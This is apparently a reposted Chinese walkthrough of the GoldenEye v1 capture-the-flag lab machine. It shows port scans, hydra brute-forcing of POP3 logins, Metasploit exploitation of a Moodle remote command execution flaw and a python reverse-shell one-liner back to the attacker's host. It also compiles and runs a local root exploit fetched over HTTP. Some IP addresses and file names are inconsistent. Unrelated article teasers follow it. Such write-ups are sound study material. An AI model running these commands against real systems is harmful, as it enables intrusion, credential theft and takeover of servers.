1-GoldenEye-v1

news/2024/9/29 1:21:06

环境

靶机:192.168.125.140
Kali:192.168.125.139

信息搜集

扫描存活主机

nmap -sP 192.168.125.0/24

扫描对目标主机进行扫描

nmap -sS -sV -T5 -A  192.168.125.140

目标主机开放25端口smtp服务,80端口http服务。

访问目标主机。

大致意思是未发现用户,导航到/sev-home/目录。对该目录进行访问,发现登录页面,但是用户名密码均未知,先记录下来,继续搜集信息。

F12查看上一个页面源码,发现terminal.js文件,尝试进行访问,发现隐藏信息。

可以发现两个用户名Boris、Natalya,一个密码HTML解码得到InvincibleHack3r,进入刚才的登录界面分别进行尝试,成功登录(最终账号密码:boris/InvincibleHack3r)

"我们已经将pop3服务配置为运行在一个非常高的非默认端口上"

第三句给出提示,pop3服务运行在一个非默认端口(默认端口为110),根据所给信息,再次对原主机进行端口扫描。

nmap -p- 192.168.4.202

发现55006,55007两个开放的端口,继续扫描端口开启的服务详细信息:

nmap -sS -sV -T5 -A -p55006,55007 192.168.125.140

可以发现两个端口都开放了pop3邮件服务,尝试访问http://192.168.4.202:55007/失败。前面已知存在两个用户Boris、Natalya,尝试进行暴力破解,通过nc进行登录pop3服务。

echo -e 'natalya\nboris' > useers.txt
hydra -L dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.125.140 -s 55007 pop3

得到结果:

[55007][pop3] host: 192.168.125.140   login: natalya   password: bird
[55007][pop3] host: 192.168.125.140   login: boris   password: secret1!

分别登录pop3并分别查看邮件内容。

nc 192.168.4.202 55007     # 登录邮箱
user boris                 # 登录用户 natalya
pass secret1!              # 登录密码 bird
list                       # 查看邮件数量
retr 1~3                   # 查看邮件内容

boris第二封邮件中提到“natalya,称她可以破坏鲍里斯的密码”;第三封邮件中提到“附件是黄金眼的最终访问密码。把它们放在这个服务器根目录下的一个隐藏文件中;一旦Xenia进入训练地点并熟悉黄金眼终端代码我们将进入最后阶段....”(应该就是flag吧!)

natalya第一封邮件提到“一个名为 Janus 的犯罪集团正在追捕 GoldenEye”;第二封邮件:

用户名:xenia
密码:RCP90rulez!
boris证实了她是合法的承包商所以只要创建账户,好吗?
如果你在外部内部域名上没有网址:severnaya-station.com/gnocertdir
**请确保编辑您的主机文件,因为您通常在网络外远程工作....
因为你是一个Linux用户,只要把这个服务器的IP指向/etc/hosts中的severnaya-station.com即可

得到一个新的用户名和密码,并且通过提示可以知道,要想访问到到它的服务器需要进行hosts文件配置

vim /etc/hosts
# 添加
192.168.125.140 severnaya-station.com

访问http://severnaya-station.com/gnocertdir/,可以看到是一个moodle的CMS,进行登录。

可以在Home/My profile/Messages中看到一个用户Doak的来信,并且可以在左上角看到该moodle的版本为2.2.3,先记录下来。同上面的步骤一样,对Doak的密码进行爆破。

[55007][pop3] host: 192.168.4.202   login: doak   password: goat

在此通过nc登录,查看邮件

James,
如果你正在阅读这篇文章,恭喜你已经走到了这一步。你知道谍报技术是怎么运作的吧?
因为我不知道。去我们的培训网站,登陆我的账号....继续挖,直到你能获取更多信息......
用户名:dr_doak
密码:4England!

看样子应该马上成功了。根据所提供的用户名和密码再次登录CMS,登录后在Message处发现同管理员的通信;在Home/ My home 右边发现文件s3cret.txt,下载查看内容:

007年,
我能够通过clear txt捕捉这个应用程序adm1n cr3ds。 
GoldenEye服务器中的大多数web应用程序中的文本都会被扫描,所以我不能在这里添加cr3dentials。
有趣的文件在这里:/dir007key/for-007.jpg

访问http://severnaya-station.com/dir007key/for-007.jpg,一张沙掉的图片,wget http://severnaya-station.com/dir007key/for-007.jpg下下来看看,exiftool for-007.jpg查看图片隐藏的一些底层内容。

可以发现有一条base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ==,解码得到:xWinter1995x!。根据线索可以知道这应该是管理员的密码,再次登录CMS,成功拿到CMS的管理员权限。

漏洞利用

根据上面所得到的Moodle版本信息,搜索Moodle 2.2.3 exp cve发现有CVE-2013-3630 漏洞可利用。

使用MSF继续进行渗透

msfconsole          # 进入msf
search moodle       # 查找moodle类型攻击的模块

这里用第二个moodle splling binary rce,【搜到的是Moodle - Remote Command Execution,这里有点迷惑,对漏洞原理还是不太清楚,可查看文末相关链接】

use 1                             # 调用1  
show options                      # 显示所有选项
set username admin                # 设置用户名
set password xWinter1995x!        # 设置密码
set rhost severnaya-station.com   # 设置:rhosts
set targeturi /gnocertdir         # 设置目录: /gnocertdir
set payload cmd/unix/reverse      # 设置payload
set lhost 192.168.125.140           # 设置:lhost(需要本地IP)

所有设置完成后run失败,是因为exp应用的shell和moodle原本所设置的Google Spell不同,需进行修改。

管理员身份进入系统对shell进行修改,记得保存。

run运行成功获得shell,查看身份。

获取交互式shell,查看主机内核信息。

python -c 'import pty; pty.spawn("/bin/bash")'     # 获取交互式tty
uname -a    # 查看主机内核

搜索:Linux ubuntu 3.13.0-32 exploit,获得exp版本:37292,CVE(CAN) ID: CVE-2015-1328。在kali中搜索攻击脚本:

searchsploit 37292        # 搜索kali本地的exp库中37292攻击脚本信息
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/   # 将脚本文件复制到当前目录

脚本需要gcc进行编译,而目标系统没有gcc,但是可以用cc进行编译。(可用which gcc查看是否安装)

修改脚本内容,将143行gcc修改为cc保存。

kali开启http服务,供靶机下载攻击脚本。

python -m http.server 8081 # 开区http服务wget http://192.168.125.140:8081 # 靶机下载脚本文件

对下载下来的脚本进行编译运行,成功获取root权限。进入根目录获取flag。

cc -o exp 37292.c     # C语言的CC代码编译点c文件
chmod +x exp          # 编译成可执行文件,并赋权
./exp                 # 执行id                   # 查看目前权限
cat .flag.txt  # 读取root下的flag信息
"568628e0d993b1973adc718237da6e93"

【另一种获取shell的方式】

Home/Site administration/Server/System paths处有执行系统命令的地方,对其进行修改。(记得保存)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.125.139",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subproce

在kali中c -lvp 6666进行监听。

Home/My profile/Blogs/Add a new entry处有触发点,点击触发后上方nc得到shell。

参考文章及漏洞相关链接:

https://blog.csdn.net/weixin_43938645/article/details/127339270

https://www.rapid7.com/db/modules/exploit/multi/http/moodle_spelling_binary_rce/

https://www.exploit-db.com/exploits/29324

https://www.exploit-db.com/exploits/37292

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/45601.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

(转)Linux环境下使用logrotate工具实现nginx日志切割

原文:https://www.cnblogs.com/even160941/p/13903291.html 一. 前提背景及需求 Nginx运行日志默认保存在Nginx安装目录下的 /usr/local/nginx/logs目录(或/var/log/nginx目录下), 包含access.log和error.log两个文件。 (1) access.log 记录了哪些用户、哪些页面以及用户浏览…

After Effects 2024 mac/win版:创意视效,梦想起航

After Effects 2024是一款引领视效革命的专业软件,汇聚了创意与技术的精华。作为Adobe推出的全新版本,它以其强大的视频处理和动画创作能力,成为从事设计和视频特技的机构,如电视台、动画制作公司、个人后期制作工作室以及多媒体工作室的得力助手。 Adobe After Effects 20…

在VP里嵌套另一个VP

要设置,长宽。😘宝子:除非不再醒来,除非太阳不再升起,不然都请你好好生活,挣扎着前进,开心的笑。(●◡●)

HieRec论文阅读笔记

HieRec: Hierarchical User Interest Modeling for Personalized News Recommendation论文阅读笔记 Abstract 现存的问题: ​ 用户兴趣建模对于个性化新闻推荐至关重要。现有的新闻推荐方法通常从每个用户以前的行为中学习一个单一的用户嵌入,以代表他们的整体兴趣。然而,用…

一文看懂怎么快捷、安全地实现制造设备数据传输

制造设备在生产过程中会产生多种类型的数据,这些数据对于设备监控、维护以及生产流程的优化至关重要。以下是制造设备可能产生的数据:1. 生产任务类数据 生产计划及执行数据、每个工位的生产工单、工单的生产开始时间、中间暂停时间、生产结束时间、每个加工工步的工时消耗信…

多多支持,才有动力

人要在当下不断寻求内在的意义,而不是期待将来的幸福。

FPGA/ZYNQ:Sobel边缘检测

一、简述 边缘检测是图像处理和计算机视觉中的基本问题,边缘检测的目的是标识数字图像中亮度变化明显的点。图像边缘检测大幅度地减少了数据量,并且剔除了可以认为不相关的信息,保留了图像重要的结构属性。所谓边缘是指其周围像素灰度急剧变化的那些像素的集合,它是图像最基…

Docker部署安装应用大集合(Tomcat、Nginx、Mysql、Redis、MQ、Nacos、Zookeeper、Portainer、MongoDB ......)

Docker部署安装应用大集合(Tomcat、Nginx、Mysql、Redis、MQ、Nacos、Zookeeper、Portainer、MongoDB ......)精选 原创CodeDevMaster2022-11-16 08:42:24博主文章分类:Docker©著作权 文章标签dockermysqlNginxNacosMQ文章分类Docker云计算yyds干货盘点 Docker部署安装应…